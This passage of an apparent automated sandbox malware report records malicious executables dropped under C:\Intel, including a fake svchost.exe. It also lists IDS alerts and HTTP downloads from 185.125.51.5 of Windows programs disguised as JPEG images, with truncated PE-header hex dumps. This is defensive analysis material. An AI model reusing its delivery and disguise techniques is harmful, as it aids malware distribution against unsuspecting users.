00000025.00000000.20362870597.00000000002DD000.00000002.00000001.01000000.00000006.sdmp, curl.exe, 00000025.00000002.20385779265.00000000002DD000.00000002.00000001.01000000.00000006.sdmp, curl.exe, 00000026.00000002.20394155958.00000000002DD000.00000002.00000001.01000000.00000006.sdmp, curl.exe, 00000026.00000000.20388028622.00000000002DD000.00000002.00000001.01000000.00000006.sdmp, curl.exe, 00000027.00000002.20416665272.00000000002DD000.00000002.00000001.01000000.00000006.sdmp, curl.exe, 00000027.00000000.20396813028.00000000002DD000.00000002.00000001.01000000.00000006.sdmp, curl.exe, 00000032.00000002.20546299739.00000000002DD000.00000002.00000001.01000000.00000006.sdmp
    Source: Binary string: SAS.pdb source: svchost.exe, 0000002A.00000003.20441959446.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000002A.00000002.20533988415.000000000145D000.00000004.00000001.01000000.00000009.sdmp, svchost.exe, 0000002C.00000002.20486832706.000000000145D000.00000004.00000001.01000000.00000009.sdmp
    Source: C:\Intel\curl.exeCode function: 34_2_002CCD06 FindFirstFileExW,GetDriveTypeW,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,FindClose,GetLastError,FindClose,GetLastError,FindClose,34_2_002CCD06
    Source: C:\Intel\curl.exeCode function: 34_2_002CFCDD FindFirstFileExW,GetDriveTypeW,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,FindClose,GetLastError,FindClose,GetLastError,FindClose,34_2_002CFCDD
    Source: C:\Intel\driver.exeCode function: 40_2_0040F8BC FindFirstFileW,GetLastError,FindNextFileW,GetLastError,FindFirstFileA,GetLastError,FindNextFileA,GetLastError,40_2_0040F8BC
    Source: C:\Intel\Trays\Trays.exeCode function: 41_2_00407C0E FindFirstFileA,41_2_00407C0E
    Source: C:\Intel\Trays\Trays.exeCode function: 41_2_0040DB44 FindFirstFileA,41_2_0040DB44
    Source: C:\Intel\Trays\Trays.exeCode function: 41_2_0040DDDC FindFirstFileA,41_2_0040DDDC
    Source: C:\Intel\svchost.exeCode function: 42_2_03E34400 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,42_2_03E34400
    Source: C:\Intel\svchost.exeCode function: 44_2_03E34400 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,44_2_03E34400
    Source: C:\Intel\svchost.exeCode function: 45_2_03E34400 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,45_2_03E34400
    Source: C:\Intel\Trays\Trays.exeCode function: 41_2_00407D0E GetLogicalDriveStringsA,41_2_00407D0E
    Source: C:\Intel\Trays\4t-min64.exeCode function: 4x nop then inc dword ptr [rbp-28h]43_2_00418560

    Networking

    barindex
    Suricata IDS alerts for network traffic
    Source: Network trafficSuricata IDS: 2025161 - Severity 1 - ET MALWARE Windows executable sent when remote host claims to send an image M4 : 185.125.51.5:80 -> 192.168.11.20:49754
    Source: Network trafficSuricata IDS: 2025169 - Severity 1 - ET MALWARE Windows Executable Downloaded With Image Content-Type Header : 185.125.51.5:80 -> 192.168.11.20:49754
    System process connects to network (likely due to code injection or exploit)
    Source: C:\Intel\svchost.exeNetwork Connect: 57.129.37.157 80
    Downloads files with wrong headers with respect to MIME Content-Type
    Source: httpImage file has PE prefix: HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 06:53:48 GMT Server: Apache/2 Upgrade: h2,h2c Connection: Upgrade Last-Modified: Sun, 01 Dec 2024 09:23:13 GMT ETag: "49400-62831fb300240" Accept-Ranges: bytes Content-Length: 300032 Content-Type: image/jpeg Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 ed bf cf 48 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 05 00 00 30 04 00 00 b8 00 00 00 00 00 00 00 10 00 00 00 10 00 00 00 40 04 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 b0 05 00 00 06 00 00 00 00 00 00 03 00 00 00 00 00 10 00 00 20 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 90 05 00 67 00 00 00 00 80 05 00 8d 0d 00 00 00 a0 05 00 f8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 05 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 00 30 04 00 00 10 00 00 00 26 04 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 00 20 01 00 00 40 04 00 00 46 00 00 00 2c 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 00 10 00 00 00 60 05 00 00 02 00 00 00 72 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 64 61 74 61 00 00 00 10 00 00 00 70 05 00 00 02 00 00 00 74 04 00 00 00 00 00 00 00 00 00 00 00 0
    Source: httpImage file has PE prefix: HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 06:53:50 GMT Server: Apache/2 Upgrade: h2,h2c Connection: Upgrade Last-Modified: Sun, 01 Dec 2024 09:23:13 GMT ETag: "3c000-62831fb300240" Accept-Ranges: bytes Content-Length: 245760 Content-Type: image/jpeg Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b6 5c 29 cb f2 3d 47 98 f2 3d 47 98 f2 3d 47 98 f2 3d 46 98 8e 3d 47 98 90 22 54 98 f5 3d 47 98 71 21 49 98 eb 3d 47 98 1a 22 4d 98 71 3d 47 98 1a 22 4c 98 d2 3d 47 98 4a 3b 41 98 f3 3d 47 98 52 69 63 68 f2 3d 47 98 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 2c 76 04 62 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 60 02 00 00 80 01 00 00 00 00 00 a4 c3 01 00 00 10 00 00 00 70 02 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 f0 03 00 00 10 00 00 00 00 00 00 03 00 00 00 00 90 01 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e0 71 03 00 50 00 00 00 00 e0 03 00 98 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 02 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 3a 59 02 00 00 10 00 00 00 60 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c8 0a 01 00 00 70 02 00 00 10 01 00 00 70 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 18 5b 00 00 00 80 03 00 00 30 00 00 00 80 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 98 04 00 00 00 e0 03 00 00 10 00 00 00 b0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
    Source: httpImage file has PE prefix: HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 06:53:52 GMT Server: Apache/2 Upgrade: h2,h2c Connection: Upgrade Last-Modified: Sun, 01 Dec 2024 09:23:14 GMT ETag: "515a00-62831fb3f4480" Accept-Ranges: bytes Content-Length: 5331456 Content-Type: image/jpeg Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 e9 1c e7 68 ad 7d 89 3b ad 7d 89 3b ad 7d 89 3b c2 0b 22 3b a5 7d 89 3b c2 0b 23 3b ae 7d 89 3b b6 e0 13 3b ac 7d 89 3b c2 0b 14 3b ac 7d 89 3b 52 69 63 68 ad 7d 89 3b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 e2 58 c7 66 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0a 00 00 2a 00 00 00 30 51 00 00 54 25 01 e5 1c 00 00 00 10 00 00 00 40 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 f0 76 01 00 04 00 00 cd bd 51 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 76 01 8c 00 00 00 00 a0 25 01 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 77 28 00 00 00 10 00 00 00 2a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 69 74 65 78 74 00 00 00 54 25 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 64 61 74 61 00 00 fa 02 00 00 00 a0 25 01 00 04 00 00 00 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 dc 26 51 00 00 b0 25 01 00 24 51 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 00 03 00 00 00 e0 76 01 00 04 00 00 00 56 51 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    Source: httpImage file has PE prefix: HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 06:53:58 GMT Server: Apache/2 Upgrade: h2,h2c Connection: Upgrade Last-Modified: Sun, 01 Dec 2024 14:22:40 GMT ETag: "cb190-628362a1aac00" Accept-Ranges: bytes Content-Length: 831888 Content-Type: image/jpeg Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 2d 82 c1 ed 69 e3 af be 69 e3 af be 69 e3 af be d4 ac 39 be 6b e3 af be 60 9b 3a be 77 e3 af be 60 9b 2c be db e3 af be 60 9b 2b be 50 e3 af be 4e 25 c2 be 63 e3 af be 4e 25 d4 be 48 e3 af be 69 e3 ae be 64 e1 af be 60 9b 20 be 2f e3 af be 77 b1 3a be 6b e3 af be 77 b1 3b be 68 e3 af be 69 e3 38 be 68 e3 af be 60 9b 3e be 68 e3 af be 52 69 63 68 69 e3 af be 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 15 16 c8 4b 00 00 00 00 00 00 00 00 e0 00 23 01 0b 01 09 00 00 02 08 00 00 fa 02 00 00 00 00 00 10 63 01 00 00 10 00 00 00 20 08 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 70 0c 00 00 04 00 00 7c 20 0d 00 02 00 00 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 3c cd 08 00 54 01 00 00 00 b0 0a 00 1c b6 01 00 00 00 00 00 00 00 00 00 f8 a1 0c 00 98 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 08 00 40 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 17 00 08 00 00 10 00 00 00 02 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 5c d9 00 00 00 20 08 00 00 da 00 00 00 06 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 18 a5 01 00 00 00 09 00 00 68 00 00 00 e0 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 1c b6 01 00 00 b0 0a 00 00 b8 01 00 00 48 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
    Uses ping.exe to check the status of other devices and networks
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 6 127.0.0.1
    Source: global trafficUDP traffic: 192.168.11.20:62457 -> 239.255.102.18:50001
    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 11 Jan 2025 06:53:48 GMTServer: Apache/2Upgrade: h2,h2cConnection: UpgradeLast-Modified: Sun, 01 Dec 2024 09:23:13 GMTETag: "49400-62831fb300240"Accept-Ranges: bytesContent-Length: 300032Content-Type: image/jpegData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 ed bf cf 48 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 05 00 00 30 04 00 00 b8 00 00 00 00 00 00 00 10 00 00 00 10 00 00 00 40 04 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 b0 05 00 00 06 00 00 00 00 00 00 03 00 00 00 00 00 10 00 00 20 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 90 05 00 67 00 00 00 00 80 05 00 8d 0d 00 00 00 a0 05 00 f8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 05 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 00 30 04 00 00 10 00 00 00 26 04 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 00 20 01 00 00 40 04 00 00 46 00 00 00 2c 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 00 10 00 00 00 60 05 00 00 02 00 00 00 72 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 64 61 74 61 00 00 00 10 00 00 00 70 05 00 00 02 00 00 00 74 04 00 00 00 00 00 00 00 00
    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 11 Jan 2025 06:53:50 GMTServer: Apache/2Upgrade: h2,h2cConnection: UpgradeLast-Modified: Sun, 01 Dec 2024 09:23:13 GMTETag: "3c000-62831fb300240"Accept-Ranges: bytesContent-Length: 245760Content-Type: image/jpegData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b6 5c 29 cb f2 3d 47 98 f2 3d 47 98 f2 3d 47 98 f2 3d 46 98 8e 3d 47 98 90 22 54 98 f5 3d 47 98 71 21 49 98 eb 3d 47 98 1a 22 4d 98 71 3d 47 98 1a 22 4c 98 d2 3d 47 98 4a 3b 41 98 f3 3d 47 98 52 69 63 68 f2 3d 47 98 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 2c 76 04 62 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 60 02 00 00 80 01 00 00 00 00 00 a4 c3 01 00 00 10 00 00 00 70 02 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 f0 03 00 00 10 00 00 00 00 00 00 03 00 00 00 00 90 01 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e0 71 03 00 50 00 00 00 00 e0 03 00 98 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 02 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 3a 59 02 00 00 10 00 00 00 60 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c8 0a 01 00 00 70 02 00 00 10 01 00 00 70 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 18 5b 00 00 00 80 03 00 00 30 00 00 00 80 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 98 04 00 00 00 e0 03 00 00 10 00 00 00 b0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 11 Jan 2025 06:53:52 GMTServer: Apache/2Upgrade: h2,h2cConnection: UpgradeLast-Modified: Sun, 01 Dec 2024 09:23:14 GMTETag: "515a00-62831fb3f4480"Accept-Ranges: bytesContent-Length: 5331456Content-Type: image/jpegData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 e9 1c e7 68 ad 7d 89 3b ad 7d 89 3b ad 7d 89 3b c2 0b 22 3b a5 7d 89 3b c2 0b 23 3b ae 7d 89 3b b6 e0 13 3b ac 7d 89 3b c2 0b 14 3b ac 7d 89 3b 52 69 63 68 ad 7d 89 3b 00 00 00 